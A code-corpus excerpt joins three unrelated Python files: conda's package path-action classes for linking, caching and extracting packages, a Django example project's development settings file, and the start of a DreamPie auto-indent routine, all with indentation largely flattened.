for spi in package_info.paths_data.paths if bool(MENU_RE.match(spi.path)))
else:
return ()
def __init__(self, transaction_context, package_info, target_prefix, target_short_path):
super(MakeMenuAction, self).__init__(transaction_context, package_info,
None, None, target_prefix, target_short_path)
self._execute_successful = False
def execute(self):
log.trace("making menu for %s", self.target_full_path)
make_menu(self.target_prefix, self.target_short_path, remove=False)
self._execute_successful = True
def reverse(self):
if self._execute_successful:
log.trace("removing menu for %s", self.target_full_path)
make_menu(self.target_prefix, self.target_short_path, remove=True)
class CreateNonadminAction(CreateInPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type):
if on_win and lexists(join(context.root_prefix, '.nonadmin')):
return cls(transaction_context, package_info, target_prefix),
else:
return ()
def __init__(self, transaction_context, package_info, target_prefix):
super(CreateNonadminAction, self).__init__(transaction_context, package_info, None, None,
target_prefix, '.nonadmin')
self._file_created = False
def execute(self):
log.trace("touching nonadmin %s", self.target_full_path)
self._file_created = touch(self.target_full_path)
def reverse(self):
if self._file_created:
log.trace("removing nonadmin file %s", self.target_full_path)
rm_rf(self.target_full_path)
class CompilePycAction(CreateInPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type,
file_link_actions):
noarch = package_info.package_metadata and package_info.package_metadata.noarch
if noarch is not None and noarch.type == NoarchType.python:
noarch_py_file_re = re.compile(r'^site-packages[/\\][^\t\n\r\f\v]+\.py$')
py_ver = transaction_context['target_python_version']
py_files = (axn.target_short_path for axn in file_link_actions
if noarch_py_file_re.match(axn.source_short_path))
return tuple(cls(transaction_context, package_info, target_prefix,
pf, pyc_path(pf, py_ver))
for pf in py_files)
else:
return ()
def __init__(self, transaction_context, package_info, target_prefix,
source_short_path, target_short_path):
super(CompilePycAction, self).__init__(transaction_context, package_info,
target_prefix, source_short_path,
target_prefix, target_short_path)
self.prefix_path_data = PathDataV1(
_path=self.target_short_path,
path_type=PathType.pyc_file,
)
self._execute_successful = False
def execute(self):
# compile_pyc is sometimes expected to fail, for example a python 3.6 file
# installed into a python 2 environment, but no code paths actually importing it
# technically then, this file should be removed from the manifest in conda-meta, but
# at the time of this writing that's not currently happening
log.trace("compiling %s", self.target_full_path)
target_python_version = self.transaction_context['target_python_version']
python_short_path = get_python_short_path(target_python_version)
python_full_path = join(self.target_prefix, win_path_ok(python_short_path))
compile_pyc(python_full_path, self.source_full_path, self.target_full_path)
self._execute_successful = True
def reverse(self):
if self._execute_successful:
log.trace("reversing pyc creation %s", self.target_full_path)
rm_rf(self.target_full_path)
class CreatePythonEntryPointAction(CreateInPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type):
noarch = package_info.package_metadata and package_info.package_metadata.noarch
if noarch is not None and noarch.type == NoarchType.python:
def this_triplet(entry_point_def):
command, module, func = parse_entry_point_def(entry_point_def)
target_short_path = "%s/%s" % (get_bin_directory_short_path(), command)
if on_win:
target_short_path += "-script.py"
return target_short_path, module, func
actions = tuple(cls(transaction_context, package_info, target_prefix,
*this_triplet(ep_def))
for ep_def in noarch.entry_points or ())
if on_win: # pragma: unix no cover
actions += tuple(
LinkPathAction.create_python_entry_point_windows_exe_action(
transaction_context, package_info, target_prefix,
requested_link_type, ep_def
) for ep_def in noarch.entry_points or ()
)
return actions
else:
return ()
def __init__(self, transaction_context, package_info, target_prefix, target_short_path,
module, func):
super(CreatePythonEntryPointAction, self).__init__(transaction_context, package_info,
None, None,
target_prefix, target_short_path)
self.module = module
self.func = func
if on_win:
path_type = PathType.windows_python_entry_point_script
else:
path_type = PathType.unix_python_entry_point
self.prefix_path_data = PathDataV1(
_path=self.target_short_path,
path_type=path_type,
)
self._execute_successful = False
def execute(self):
log.trace("creating python entry point %s", self.target_full_path)
if on_win:
python_full_path = None
else:
target_python_version = self.transaction_context['target_python_version']
python_short_path = get_python_short_path(target_python_version)
python_full_path = join(self.target_prefix, win_path_ok(python_short_path))
create_python_entry_point(self.target_full_path, python_full_path,
self.module, self.func)
self._execute_successful = True
def reverse(self):
if self._execute_successful:
log.trace("reversing python entry point creation %s", self.target_full_path)
rm_rf(self.target_full_path)
# class CreateApplicationEntryPointWindowsExeAction(LinkPathAction):
#
# @classmethod
# def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type, # NOQA
# exe_path):
# source_directory = context.conda_prefix
# source_short_path = 'Scripts/conda.exe'
# target_short_path = exe_path
# return cls(transaction_context, package_info, source_directory,
# source_short_path, target_prefix, target_short_path, requested_link_type)
#
# def __init__(self, transaction_context, package_info, source_prefix, source_short_path,
# target_prefix, target_short_path, requested_link_type):
# super(CreateApplicationEntryPointWindowsExeAction, self).__init__(
# transaction_context, package_info, source_prefix, source_short_path,
# target_prefix, target_short_path, requested_link_type,
# )
# self.leased_path_entry = LeasedPathEntry(
# _path=target_short_path,
# target_path=self.source_full_path,
# target_prefix=source_prefix,
# leased_path=self.target_full_path,
# package_name=package_info.index_json_record.name,
# leased_path_type=self.leased_path_type,
# )
#
# @property
# def leased_path_type(self):
# return LeasedPathType.application_entry_point_windows_exe
# class CreateApplicationEntryPointAction(CreateLeasedPathAction):
#
# @classmethod
# def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type): # NOQA
# preferred_env = package_info.repodata_record.preferred_env
# if preferred_env_matches_prefix(preferred_env, target_prefix, context.root_prefix):
# exe_paths = (package_info.package_metadata
# and package_info.package_metadata.preferred_env
# and package_info.package_metadata.preferred_env.executable_paths
# or ())
#
# # target_prefix for the instantiated path action is the root prefix, not the same
# # as target_prefix for the larger transaction
# assert is_private_env_path(target_prefix)
# root_prefix = dirname(dirname(target_prefix))
#
# if on_win:
# def make_app_entry_point_axns(exe_path):
# assert exe_path.endswith(('.exe', '.bat'))
# target_short_path = exe_path[:-4] + "-script.py"
# yield cls(transaction_context, package_info, target_prefix, exe_path,
# root_prefix, target_short_path)
#
# yield CreateApplicationEntryPointWindowsExeAction.create_actions(
# transaction_context, package_info, root_prefix,
# LinkType.hardlink, exe_path[:-4] + ".exe"
# )
# return tuple(concat(make_app_entry_point_axns(executable_short_path)
# for executable_short_path in exe_paths))
#
# else:
# return tuple(
# cls(transaction_context, package_info, target_prefix, executable_short_path,
# root_prefix, executable_short_path)
# for executable_short_path in exe_paths
# )
# else:
# return ()
#
# def execute(self):
# log.trace("creating application entry point %s => %s",
# self.source_full_path, self.target_full_path)
# if self.source_prefix == context.conda_prefix:
# # this could blow up for the special case of application entry points in conda's
# # private environment
# # in that case, probably should use the python version from transaction_context
# conda_python_version = self.transaction_context['target_python_version']
# else:
# conda_python_version = get_python_version_for_prefix(context.conda_prefix)
# conda_python_short_path = get_python_short_path(conda_python_version)
# conda_python_full_path = join(context.conda_prefix, win_path_ok(conda_python_short_path))
# create_application_entry_point(self.source_full_path, self.target_full_path,
# conda_python_full_path)
# self._execute_successful = True
#
# @property
# def leased_path_type(self):
# return LeasedPathType.application_entry_point
#
#
# class CreateApplicationSoftlinkAction(CreateLeasedPathAction):
#
# @classmethod
# def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type): # NOQA
# preferred_env = package_info.repodata_record.preferred_env
# if preferred_env_matches_prefix(preferred_env, target_prefix, context.root_prefix):
# softlink_paths = (package_info.package_metadata
# and package_info.package_metadata.preferred_env
# and package_info.package_metadata.preferred_env.softlink_paths
# or ())
#
# # target_prefix for the instantiated path action is the root prefix, not the same
# # as target_prefix for the larger transaction
# assert is_private_env_path(target_prefix)
# root_prefix = dirname(dirname(target_prefix))
# softlink_supported_test_file = join(target_prefix, PREFIX_MAGIC_FILE)
#
# def make_softlink_exe_axn(softlink_short_path):
# if not on_win: # pragma: win no cover
# root_short_path = softlink_short_path
# softlink_method = 'softlink'
# else: # pragma: unix no cover
# windows_pathext = os.getenv('PATHEXT', '').lower().split(';')
# path_root, path_ext = splitext(softlink_short_path)
#
# if softlink_supported(softlink_supported_test_file, root_prefix):
# root_short_path = softlink_short_path
# softlink_method = 'softlink'
# elif path_ext.lower() in windows_pathext:
# root_short_path = splitext(softlink_short_path)[0] + '.bat'
# softlink_method = 'fake_exe_softlink'
# else:
# root_short_path = softlink_short_path
# softlink_method = 'softlink_or_fail_ok'
#
# return cls(transaction_context, package_info, target_prefix, softlink_short_path,
# root_prefix, root_short_path, softlink_method)
#
# return tuple(make_softlink_exe_axn(softlink_short_path)
# for softlink_short_path in softlink_paths)
#
# else:
# return ()
#
# def __init__(self, transaction_context, package_info, source_prefix, source_short_path,
# target_prefix, target_short_path, softlink_method):
# super(CreateApplicationSoftlinkAction, self).__init__(transaction_context, package_info,
# source_prefix, source_short_path,
# target_prefix, target_short_path)
# self.softlink_method = softlink_method
#
# def execute(self):
# log.trace("creating application softlink via %s %s => %s",
# self.softlink_method, self.source_full_path, self.target_full_path)
# getattr(self, self.softlink_method)()
# self._execute_successful = True
#
# def softlink(self):
# symlink(self.source_full_path, self.target_full_path)
# assert islink(self.target_full_path)
#
# def fake_exe_softlink(self): # pragma: unix no cover
# create_fake_executable_softlink(self.source_full_path, self.target_full_path)
#
# def softlink_or_fail_ok(self): # pragma: unix no cover
# try:
# symlink(self.source_full_path, self.target_full_path)
# except (IOError, OSError) as e:
# log.trace('%r', e)
#
# @property
# def leased_path_type(self):
# return LeasedPathType.application_softlink
class CreatePrefixRecordAction(CreateInPrefixPathAction):
    # this is the action that creates a package's JSON file in the conda-meta/ directory
@classmethod
def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type,
requested_spec, all_link_path_actions):
extracted_package_dir = package_info.extracted_package_dir
target_short_path = 'conda-meta/%s.json' % basename(extracted_package_dir)
return cls(transaction_context, package_info, target_prefix, target_short_path,
requested_link_type, requested_spec, all_link_path_actions),
def __init__(self, transaction_context, package_info, target_prefix, target_short_path,
requested_link_type, requested_spec, all_link_path_actions):
super(CreatePrefixRecordAction, self).__init__(transaction_context, package_info,
None, None, target_prefix,
target_short_path)
self.requested_link_type = requested_link_type
self.requested_spec = requested_spec
self.all_link_path_actions = all_link_path_actions
def execute(self):
link = Link(
source=self.package_info.extracted_package_dir,
type=self.requested_link_type,
)
extracted_package_dir = self.package_info.extracted_package_dir
package_tarball_full_path = extracted_package_dir + CONDA_TARBALL_EXTENSION
# TODO: don't make above assumption; put package_tarball_full_path in package_info
files = (x.target_short_path for x in self.all_link_path_actions if x)
paths_data = PathsData(
paths_version=1,
paths=(x.prefix_path_data for x in self.all_link_path_actions
if x and x.prefix_path_data),
)
self.prefix_record = PrefixRecord.from_objects(
self.package_info.repodata_record,
self.package_info.index_json_record,
self.package_info.package_metadata,
requested_spec=text_type(self.requested_spec),
paths_data=paths_data,
files=files,
link=link,
url=self.package_info.url,
extracted_package_dir=extracted_package_dir,
package_tarball_full_path=package_tarball_full_path,
)
log.trace("creating linked package record %s", self.target_full_path)
PrefixData(self.target_prefix).insert(self.prefix_record)
def reverse(self):
log.trace("reversing linked package record creation %s", self.target_full_path)
# TODO: be careful about failure here, and being too strict
PrefixData(self.target_prefix).remove(self.package_info.index_json_record.name)
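# Editor's note (illustrative example, not from the original source): for a package
# extracted to, say, <pkgs_dir>/requests-2.18.4-py36_1, the action above writes its
# record to <target_prefix>/conda-meta/requests-2.18.4-py36_1.json, which is how the
# environment later knows that package is linked into it.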
class UpdateHistoryAction(CreateInPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, target_prefix, remove_specs, update_specs):
target_short_path = join('conda-meta', 'history')
return cls(transaction_context, target_prefix, target_short_path,
remove_specs, update_specs),
def __init__(self, transaction_context, target_prefix, target_short_path, remove_specs,
update_specs):
super(UpdateHistoryAction, self).__init__(transaction_context, None, None, None,
target_prefix, target_short_path)
self.remove_specs = remove_specs
self.update_specs = update_specs
self.hold_path = self.target_full_path + '.c~'
def execute(self):
log.trace("updating environment history %s", self.target_full_path)
if lexists(self.target_full_path):
copy(self.target_full_path, self.hold_path)
h = History(self.target_prefix)
h.update()
h.write_specs(self.remove_specs, self.update_specs)
def reverse(self):
if lexists(self.hold_path):
log.trace("moving %s => %s", self.hold_path, self.target_full_path)
backoff_rename(self.hold_path, self.target_full_path, force=True)
def cleanup(self):
rm_rf(self.hold_path)
class RegisterEnvironmentLocationAction(PathAction):
def __init__(self, transaction_context, target_prefix):
self.transaction_context = transaction_context
self.target_prefix = target_prefix
self._execute_successful = False
def verify(self):
touch(USER_ENVIRONMENTS_TXT_FILE, mkdir=True, sudo_safe=True)
self._verified = True
def execute(self):
log.trace("registering environment in catalog %s", self.target_prefix)
register_env(self.target_prefix)
self._execute_successful = True
def reverse(self):
pass
def cleanup(self):
pass
@property
def target_full_path(self):
raise NotImplementedError()
# class RegisterPrivateEnvAction(EnvsDirectoryPathAction):
#
# @classmethod
# def create_actions(cls, transaction_context, package_info, target_prefix, requested_spec,
# leased_paths):
# preferred_env = package_info.repodata_record.preferred_env
# if preferred_env_matches_prefix(preferred_env, target_prefix, context.root_prefix):
# return cls(transaction_context, package_info, context.root_prefix, preferred_env,
# requested_spec, leased_paths),
# else:
# return ()
#
# def __init__(self, transaction_context, package_info, root_prefix, env_name, requested_spec,
# leased_paths):
# self.root_prefix = root_prefix
# self.env_name = ensure_pad(env_name)
# target_prefix = join(self.root_prefix, 'envs', self.env_name)
# super(RegisterPrivateEnvAction, self).__init__(transaction_context, target_prefix)
#
# self.package_name = package_info.index_json_record.name
# self.requested_spec = requested_spec
# self.leased_paths = leased_paths
#
# fn = basename(package_info.extracted_package_dir) + '.json'
# self.conda_meta_path = join(self.target_prefix, 'conda-meta', fn)
#
# def execute(self):
# log.trace("registering private env for %s", self.target_prefix)
#
# # touches env prefix entry in catalog.json
# # updates leased_paths
# from .envs_manager import EnvsDirectory
# ed = EnvsDirectory(self.envs_dir_path)
#
# self.envs_dir_state = ed._get_state()
#
# for leased_path_entry in self.leased_paths:
# ed.add_leased_path(leased_path_entry)
#
# ed.add_preferred_env_package(self.env_name, self.package_name, self.conda_meta_path,
# self.requested_spec)
# ed.write_to_disk()
# self._execute_successful = True
#
# def reverse(self):
# if self._execute_successful:
# log.trace("reversing environment unregistration in catalog for %s", self.target_prefix) # NOQA
# from .envs_manager import EnvsDirectory
# ed = EnvsDirectory(self.envs_dir_path)
# ed._set_state(self.envs_dir_state)
# ed.write_to_disk()
# ######################################################
# Removal of Paths within a Prefix
# ######################################################
@with_metaclass(ABCMeta)
class RemoveFromPrefixPathAction(PrefixPathAction):
def __init__(self, transaction_context, linked_package_data, target_prefix, target_short_path):
super(RemoveFromPrefixPathAction, self).__init__(transaction_context,
target_prefix, target_short_path)
self.linked_package_data = linked_package_data
def verify(self):
        # inability to remove will trigger a rollback
        # we can't know for certain whether a path can be removed until removal is attempted and fails
self._verified = True
class UnlinkPathAction(RemoveFromPrefixPathAction):
def __init__(self, transaction_context, linked_package_data, target_prefix, target_short_path,
link_type=LinkType.hardlink):
super(UnlinkPathAction, self).__init__(transaction_context, linked_package_data,
target_prefix, target_short_path)
conda_temp_extension = '.c~'
self.holding_short_path = self.target_short_path + conda_temp_extension
self.holding_full_path = self.target_full_path + conda_temp_extension
self.link_type = link_type
def execute(self):
if self.link_type != LinkType.directory:
log.trace("renaming %s => %s", self.target_short_path, self.holding_short_path)
backoff_rename(self.target_full_path, self.holding_full_path, force=True)
def reverse(self):
if self.link_type != LinkType.directory and lexists(self.holding_full_path):
log.trace("reversing rename %s => %s", self.holding_short_path, self.target_short_path)
backoff_rename(self.holding_full_path, self.target_full_path, force=True)
def cleanup(self):
if self.link_type == LinkType.directory:
try_rmdir_all_empty(self.target_full_path)
else:
rm_rf(self.holding_full_path)
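# Editor's sketch (hypothetical helper, not part of conda; kept commented out because the
# surrounding module does not necessarily import contextlib): UnlinkPathAction above follows
# the execute/reverse/cleanup pattern, where execute() parks the file under a ".c~" name,
# reverse() restores it if the transaction rolls back, and cleanup() discards the parked
# copy once everything succeeded. A minimal standalone approximation of that life cycle:
#
#     import contextlib, os
#
#     @contextlib.contextmanager
#     def _sketch_transactional_unlink(path):
#         hold = path + '.c~'
#         os.rename(path, hold)            # execute: move the file out of the way
#         try:
#             yield
#         except Exception:
#             os.rename(hold, path)        # reverse: put it back on failure
#             raise
#         else:
#             os.remove(hold)              # cleanup: drop the parked copy on success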
class RemoveMenuAction(RemoveFromPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, linked_package_data, target_prefix):
if on_win:
MENU_RE = re.compile(r'^menu/.*\.json$', re.IGNORECASE)
return tuple(cls(transaction_context, linked_package_data, target_prefix, trgt)
for trgt in linked_package_data.files if bool(MENU_RE.match(trgt)))
else:
return ()
def __init__(self, transaction_context, linked_package_data,
target_prefix, target_short_path):
super(RemoveMenuAction, self).__init__(transaction_context, linked_package_data,
target_prefix, target_short_path)
def execute(self):
log.trace("removing menu for %s ", self.target_prefix)
make_menu(self.target_prefix, self.target_short_path, remove=True)
def reverse(self):
log.trace("re-creating menu for %s ", self.target_prefix)
make_menu(self.target_prefix, self.target_short_path, remove=False)
def cleanup(self):
pass
class RemoveLinkedPackageRecordAction(UnlinkPathAction):
def __init__(self, transaction_context, linked_package_data, target_prefix, target_short_path):
super(RemoveLinkedPackageRecordAction, self).__init__(transaction_context,
linked_package_data,
target_prefix, target_short_path)
def execute(self):
super(RemoveLinkedPackageRecordAction, self).execute()
PrefixData(self.target_prefix).remove(self.linked_package_data.name)
def reverse(self):
super(RemoveLinkedPackageRecordAction, self).reverse()
PrefixData(self.target_prefix)._load_single_record(self.target_full_path)
class UnregisterEnvironmentLocationAction(PathAction):
def __init__(self, transaction_context, target_prefix):
self.transaction_context = transaction_context
self.target_prefix = target_prefix
self._execute_successful = False
def verify(self):
self._verified = True
def execute(self):
log.trace("unregistering environment in catalog %s", self.target_prefix)
unregister_env(self.target_prefix)
self._execute_successful = True
def reverse(self):
pass
def cleanup(self):
pass
@property
def target_full_path(self):
raise NotImplementedError()
# class UnregisterPrivateEnvAction(EnvsDirectoryPathAction):
#
# @classmethod
# def create_actions(cls, transaction_context, linked_package_data, target_prefix):
# preferred_env = ensure_pad(linked_package_data.preferred_env)
# if preferred_env_matches_prefix(preferred_env, target_prefix, context.root_prefix):
# package_name = linked_package_data.name
#
# from .envs_manager import EnvsDirectory
# envs_directory_path = EnvsDirectory.get_envs_directory_for_prefix(target_prefix)
# ed = EnvsDirectory(envs_directory_path)
#
# ed.get_leased_path_entries_for_package(package_name)
#
# leased_path_entries = ed.get_leased_path_entries_for_package(package_name)
# leased_paths_to_remove = tuple(lpe._path for lpe in leased_path_entries)
# unlink_leased_path_actions = (UnlinkPathAction(transaction_context, None,
# context.root_prefix, lp)
# for lp in leased_paths_to_remove)
#
# unregister_private_env_actions = cls(transaction_context, context.root_prefix,
# package_name),
#
# return concatv(unlink_leased_path_actions, unregister_private_env_actions)
#
# else:
# return ()
#
# def __init__(self, transaction_context, root_prefix, package_name):
# super(UnregisterPrivateEnvAction, self).__init__(transaction_context, root_prefix)
# self.root_prefix = root_prefix
# self.package_name = package_name
#
# def execute(self):
# log.trace("unregistering private env for %s", self.package_name)
#
# from .envs_manager import EnvsDirectory
# ed = EnvsDirectory(self.envs_dir_path)
#
# self.envs_dir_state = ed._get_state()
#
# ed.remove_preferred_env_package(self.package_name)
#
# ed.write_to_disk()
# self._execute_successful = True
#
# def reverse(self):
# if self._execute_successful:
# log.trace("reversing environment unregistration in catalog for %s",
# self.target_prefix)
# from .envs_manager import EnvsDirectory
# ed = EnvsDirectory(self.envs_dir_path)
# ed._set_state(self.envs_dir_state)
# ed.write_to_disk()
# ######################################################
# Fetch / Extract Actions
# ######################################################
class CacheUrlAction(PathAction):
def __init__(self, url, target_pkgs_dir, target_package_basename,
md5sum=None, expected_size_in_bytes=None):
self.url = url
self.target_pkgs_dir = target_pkgs_dir
self.target_package_basename = target_package_basename
self.md5sum = md5sum
self.expected_size_in_bytes = expected_size_in_bytes
self.hold_path = self.target_full_path + '.c~'
def verify(self):
assert '::' not in self.url
self._verified = True
def execute(self, progress_update_callback=None):
# I hate inline imports, but I guess it's ok since we're importing from the conda.core
# The alternative is passing the PackageCache class to CacheUrlAction __init__
from .package_cache_data import PackageCacheData
target_package_cache = PackageCacheData(self.target_pkgs_dir)
log.trace("caching url %s => %s", self.url, self.target_full_path)
if lexists(self.hold_path):
rm_rf(self.hold_path)
if lexists(self.target_full_path):
if self.url.startswith('file:/') and self.url == path_to_url(self.target_full_path):
# the source and destination are the same file, so we're done
return
else:
backoff_rename(self.target_full_path, self.hold_path, force=True)
if self.url.startswith('file:/'):
source_path = unquote(url_to_path(self.url))
if dirname(source_path) in context.pkgs_dirs:
# if url points to another package cache, link to the writable cache
create_hard_link_or_copy(source_path, self.target_full_path)
source_package_cache = PackageCacheData(dirname(source_path))
# the package is already in a cache, so it came from a remote url somewhere;
# make sure that remote url is the most recent url in the
# writable cache urls.txt
origin_url = source_package_cache._urls_data.get_url(self.target_package_basename)
if origin_url and has_platform(origin_url, context.known_subdirs):
target_package_cache._urls_data.add_url(origin_url)
else:
# so our tarball source isn't a package cache, but that doesn't mean it's not
# in another package cache somewhere
# let's try to find the actual, remote source url by matching md5sums, and then
# record that url as the remote source url in urls.txt
# we do the search part of this operation before the create_link so that we
# don't md5sum-match the file created by 'create_link'
# there is no point in looking for the tarball in the cache that we are writing
# this file into because we have already removed the previous file if there was
# any. This also makes sure that we ignore the md5sum of a possible extracted
# directory that might exist in this cache because we are going to overwrite it
# anyway when we extract the tarball.
source_md5sum = compute_md5sum(source_path)
exclude_caches = self.target_pkgs_dir,
pc_entry = PackageCacheData.tarball_file_in_cache(source_path, source_md5sum,
exclude_caches=exclude_caches)
if pc_entry:
origin_url = target_package_cache._urls_data.get_url(
pc_entry.extracted_package_dir
)
else:
origin_url = None
# copy the tarball to the writable cache
create_link(source_path, self.target_full_path, link_type=LinkType.copy,
force=context.force)
if origin_url and has_platform(origin_url, context.known_subdirs):
target_package_cache._urls_data.add_url(origin_url)
else:
target_package_cache._urls_data.add_url(self.url)
else:
download(self.url, self.target_full_path, self.md5sum,
progress_update_callback=progress_update_callback)
target_package_cache._urls_data.add_url(self.url)
def reverse(self):
if lexists(self.hold_path):
log.trace("moving %s => %s", self.hold_path, self.target_full_path)
backoff_rename(self.hold_path, self.target_full_path, force=True)
def cleanup(self):
rm_rf(self.hold_path)
@property
def target_full_path(self):
return join(self.target_pkgs_dir, self.target_package_basename)
def __str__(self):
return 'CacheUrlAction<url=%r, target_full_path=%r>' % (self.url, self.target_full_path)
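# Editor's note (descriptive summary, not from the original source): CacheUrlAction.execute()
# above handles three cases: a file:// url that already points at the target cache entry is a
# no-op; a local tarball is hard-linked or copied into the writable cache, recovering its
# original remote url from another cache's urls.txt or an md5 match when possible; anything
# else is downloaded and the url recorded in urls.txt.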
class ExtractPackageAction(PathAction):
def __init__(self, source_full_path, target_pkgs_dir, target_extracted_dirname,
record_or_spec, md5sum):
self.source_full_path = source_full_path
self.target_pkgs_dir = target_pkgs_dir
self.target_extracted_dirname = target_extracted_dirname
self.hold_path = self.target_full_path + '.c~'
self.record_or_spec = record_or_spec
self.md5sum = md5sum
def verify(self):
self._verified = True
def execute(self, progress_update_callback=None):
# I hate inline imports, but I guess it's ok since we're importing from the conda.core
        # The alternative is passing the classes to ExtractPackageAction __init__
from .package_cache_data import PackageCacheData
log.trace("extracting %s => %s", self.source_full_path, self.target_full_path)
if lexists(self.hold_path):
rm_rf(self.hold_path)
if lexists(self.target_full_path):
try:
backoff_rename(self.target_full_path, self.hold_path)
except (IOError, OSError) as e:
if e.errno == EXDEV:
# OSError(18, 'Invalid cross-device link')
# https://github.com/docker/docker/issues/25409
# ignore, but we won't be able to roll back
log.debug("Invalid cross-device link on rename %s => %s",
self.target_full_path, self.hold_path)
rm_rf(self.target_full_path)
else:
raise
extract_tarball(self.source_full_path, self.target_full_path,
progress_update_callback=progress_update_callback)
index_json_record = read_index_json(self.target_full_path)
if isinstance(self.record_or_spec, MatchSpec):
url = self.record_or_spec.get_raw_value('url')
assert url
channel = Channel(url) if has_platform(url, context.known_subdirs) else Channel(None)
fn = basename(url)
md5 = self.md5sum or compute_md5sum(self.source_full_path)
repodata_record = PackageRecord.from_objects(index_json_record, url=url,
channel=channel, fn=fn, md5=md5)
else:
repodata_record = PackageRecord.from_objects(self.record_or_spec, index_json_record)
repodata_record_path = join(self.target_full_path, 'info', 'repodata_record.json')
write_as_json_to_file(repodata_record_path, repodata_record)
target_package_cache = PackageCacheData(self.target_pkgs_dir)
package_cache_record = PackageCacheRecord.from_objects(
repodata_record,
package_tarball_full_path=self.source_full_path,
extracted_package_dir=self.target_full_path,
)
target_package_cache.insert(package_cache_record)
# dist = Dist(recorded_url) if recorded_url else Dist(path_to_url(self.source_full_path))
# package_cache_entry = PackageCacheRecord.make_legacy(self.target_pkgs_dir, dist)
# target_package_cache[package_cache_entry.dist] = package_cache_entry
def reverse(self):
rm_rf(self.target_full_path)
if lexists(self.hold_path):
log.trace("moving %s => %s", self.hold_path, self.target_full_path)
rm_rf(self.target_full_path)
backoff_rename(self.hold_path, self.target_full_path)
def cleanup(self):
rm_rf(self.hold_path)
@property
def target_full_path(self):
return join(self.target_pkgs_dir, self.target_extracted_dirname)
def __str__(self):
return ('ExtractPackageAction<source_full_path=%r, target_full_path=%r>'
% (self.source_full_path, self.target_full_path))
|
Microsoft/PTVS
|
Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/conda/core/path_actions.py
|
Python
|
apache-2.0
| 57,237
|
"""
Django settings for example project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Add ./BASE_DIR/../ to sys path so we can use panels
import sys
sys.path.append(os.path.dirname(BASE_DIR))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'tw0%24r54@r=3bbu=!hx6!7c1y_1#oge2jhlg!5+mxl_=1l5^$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_pygments',
'turbolinks',
'vesper',
'crispy_forms',
'nested_admin',
'example.foundation',
'example.components',
'example.patterns',
'example.views',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'turbolinks.middleware.TurbolinksMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
#'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'example.urls'
WSGI_APPLICATION = 'example.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# NAVIGATION = {
# {
# 'title': 'Sales',
# 'icon': 'sales',
# 'link': '/admin/scm/',
# 'children': [
# {
# 'title': 'Order',
# 'icon': 'sales-order',
# 'link': '/admin/scm/order',
# },
# {
# 'title': 'Shipment',
# 'icon': 'sales-shipment',
# 'link': '/admin/scm/order',
# },
# ]
# },
# {
# 'title': 'Catalog',
# 'icon': 'catalog',
# 'link': '/admin/pim/',
# 'children': [
# {
# 'title': 'Categories',
# 'icon': 'catalog-categories',
# 'link': '/admin/pim/categories',
# },
# {
# 'title': 'Products',
# 'icon': 'catalog-products',
# 'link': 'admin/pim/products'
# }
# ]
# }
# }
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
THEME = 'default'
|
Merino/poc-cbb
|
tests/example/settings.py
|
Python
|
bsd-3-clause
| 3,313
|
# Copyright 2009 Noam Yorav-Raphael
#
# This file is part of DreamPie.
#
# DreamPie is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DreamPie is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with DreamPie. If not, see <http://www.gnu.org/licenses/>.
__all__ = ['newline_and_indent']
from . import pyparse
from .common import get_text
def newline_and_indent(sourceview, INDENT_WIDTH):
"""
Get a sourceview. Add a newline and indent - what happens when the user
    presses Enter.
"""
# This is based on newline_and_indent_event(),
# from idlelib/EditorWindow.py
sb = sourceview.get_buffer()
sb.begin_user_action()
insert_mark = sb.get_insert()
insert = lambda: sb.get_iter_at_mark(insert_mark)
try:
sb.delete_selection(True, True)
line = get_text(sb, sb.get_iter_at_line(insert().get_line()), insert())
i, n = 0, len(line)
while i < n and line[i] in " \t":
i = i+1
if i == n:
# the cursor is in or at leading indentation in a continuation
# line; just copy the indentation
sb.insert_at_cursor('\n'+line)
sourceview.scroll_mark_onscreen(sb.get_insert())
return True
indent = line[:i]
# strip whitespace before insert point
i = 0
while line and line[-1] in " \t":
line = line[:-1]
i = i+1
if i:
